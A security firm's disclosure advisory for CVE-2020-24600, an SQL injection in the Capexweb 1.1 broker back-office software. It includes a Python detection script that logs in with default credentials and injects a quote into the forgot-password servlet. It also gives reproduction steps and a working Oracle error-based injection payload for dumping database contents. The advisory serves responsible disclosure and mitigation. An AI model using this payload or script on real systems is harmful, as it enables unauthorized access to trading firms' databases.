How to Detect CVE- 2020-24600?

Shilpi, SQL injection, vulnerabilities, Zero Day

Nov 27, 2020

A new zero-day vulnerability, CVE-2020-24600, was discovered by Cyber Security Works in Shilpi – Capexweb 1.1 a multiexchange BackOffice Solution for Capital and Derivative Market brokers in India.

This vulnerability was discovered in our research lab on July 01, 2020. Our team has also released a script to detect this vulnerability.

You can use the following script to detect this vulnerability –

import os

import sys

import urllib

from urllib import error

from urllib import request

import ssl

from lxml import html

# Ignore SSL certificate errors

ctx = ssl.create_default_context()

ctx.check_hostname = False

ctx.verify_mode = ssl.CERT_NONE

def main():

if(len(sys.argv) <= 1):

print(“Usage: python capexweb.py <hostname> <port>”)

return

host = sys.argv[1]

#default port 443

port = “443”

#initializing port

if(sys.argv[2] != “”):

port = sys.argv[2]

#default path

path = “/capexweb”

URL = “https://” + host + “:” + port + path

loginformURI = “/capexweb/capexmain_middle.htm”

try:

#Request to fetch login form parameters

response = urllib.request.urlopen(URL + loginformURI, context=ctx)

tree = html.fromstring(response.read())

form = tree.find(‘.//form’)

action = form.action

params = {}

params[“dfuserid”] = “admin”

params[“dfpassword”] = “password”

params[“dfcode”] = tree.find(‘.//input[@name=”dfcode”]’).value

params[“dfparentdb”] = tree.find(‘.//input[@name=”dfparentdb”]’).value

params[“dfparentip”] = tree.find(‘.//input[@name=”dfparentip”]’).value

params[“dfinstaldrive”] = tree.find(‘.//input[@name=”dfinstaldrive”]’).value

params[“B1″] = tree.find(‘.//input[@name=”B1”]’).value

#Submission of login request and capturing the session-id

loginURL = URL + action.replace(“..”,””)

loginargs = urllib.parse.urlencode(params)

params = bytes(loginargs, “utf-8”)

req = urllib.request.Request(loginURL, params)

response = urllib.request.urlopen(req, context=ctx)

cookie = response.info()[“Set-Cookie”].split(“;”)[0]

#Sending request to get forgotpassword mail along with the captured session-id

forgotURI = “/servlet/capexweb.cap_sendMail?dfuserid=admin’&dfpanno=&dfsendmode=EMAIL&x=28&y=14&dfcaller=Actual”

forgotURL = URL + forgotURI

req = urllib.request.Request(forgotURL)

req.add_header(“Cookie”, cookie)

response = urllib.request.urlopen(req, context=ctx)

response = str(response.read())

if “ORA-01756” in response:

print(“The {0} is vulnerable”.format(URL))

else:

print(“The {0} is not vulnerable”.format(URL))

except urllib.error.URLError as e:

print(e.reason())

if __name__ == “__main__”:

main()

Impact

As of today,1390 trading companies use this software as their backend and if this vulnerability is exploited successfully, it may result in unauthorized users’ access to the database and result in a data breach. The vulnerability can potentially enable threat actors to disrupt trade as they move laterally within the network and cause a huge impact on the economy.

Detection

CVE-2020-24600 was detected manually. The GET request parameters in servlet /capexweb.cap_send mail is vulnerable to SQL Injection.

Disclosure

The vulnerability was disclosed to Shilpi on July 01, 2020.

Timeline

Date	Description
July 01, 2020	Discovered in our research lab
July 17, 2020	Followed up with the Vendor
July 29, 2020	Followed up with the Vendor
October 7, 2020	Informed CERT-in about the vulnerability
November 27, 2020	CERT-in confirmed the vulnerability fix

Incident Analysis

The CVE-2020-24600 allows an adversary to initiate a SQL injection to access the contents of the database. As per the Google dork results (/capexweb/capexweb), currently, 1390 trading companies use this software.

Vendor	Product	Versions
Shilpi	Capexweb	Capexweb 1.1

Vulnerability Analysis

The send mail functionality in forgot password is vulnerable to SQL injection. An adversary can access the contents of the database.

Proof of Concept

Product: CAPExWeb (A multiexchange BackOffice Solution for Capital and Derivative Market brokers in India)

Product version: Capexweb 1.1

Vulnerable URL: http://www.shilpisoft.com/sunil/corporate.zip

Severity rating: High

CVSS V3 Score: 8.6

Steps to reproduce:

Step 1: Visit the /capexweb/capexweb URL on the server where the capexweb client is installed.

Step 2: Now, fill the login form with invalid credentials and click Submit.

Figure 1: Login form with invalid credentials.

Figure 2: Response shows the credentials are invalid.

Step 3: From error response, click on the “Forgot My Userid or Password” link.

Note: We cannot navigate to the capforgotpassword.jsp directly. As the application takes the user id from the previously submitted request.

Figure 3: Forgot password page with user-id value submitted in login page. Now, click on the Send Request button, and you will receive a Response from the server for an invalid user id.

Figure 4: Replay of forgot password page with user-id value contains a single quote returns ORA string not properly terminated error message from the database.

Figure 5: The payload XORXX’)) or%201=ctxsys.drithsx.sn (1, (select%20sys.stragg(distinct%20banner) %20from%20v$version)) — in request to retrieve the data from the database in error information.

Figure 6: The available databases in the Oracle database server.

Mitigation

We recommend the following fixes for this vulnerability.

Implement input validation for special characters in request parameters before passing to the database for processing.
Show a custom error message to restrict the users to see the cause for error at the server end.

Recommendation

We recommend that the vulnerability should be fixed as the severity rating is high and seeks immediate attention. As a workaround, we recommend the trading companies to restrict access to the URLs (/capexweb/servlet/capexweb.cap_sendMail).

Attack Surface Management

Vulnerability Intelligence

Vulnerability Management

Penetration Testing

PARTNERS

RESOURCES

WHO WE ARE

CAREERS